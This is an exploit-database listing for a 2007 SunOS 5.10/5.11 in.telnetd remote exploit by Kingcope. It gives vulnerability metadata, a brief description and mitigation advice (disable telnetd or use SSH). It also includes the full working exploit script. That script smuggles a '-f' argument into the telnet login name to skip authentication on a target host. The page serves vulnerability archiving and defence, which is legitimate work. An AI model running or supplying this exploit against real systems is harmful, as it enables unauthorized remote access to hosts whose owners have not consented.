header-logo
Suggest Exploit
vendor:
SunOS
by:
Kingcope
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: SunOS
Affected Version From: SunOS 5.10
Affected Version To: SunOS 5.11
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: SunOS 5.10, SunOS 5.11
2007

SunOS 5.10/5.11 in.telnetd Remote Exploit

This exploit targets the in.telnetd service in SunOS 5.10 and 5.11. It allows an attacker to execute arbitrary code remotely by sending a specially crafted payload. The exploit was developed by Kingcope in 2007.

Mitigation:

To mitigate this vulnerability, it is recommended to disable the in.telnetd service or use a more secure alternative such as SSH.
Source

Exploit-DB raw data:

#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1

# milw0rm.com [2007-02-11]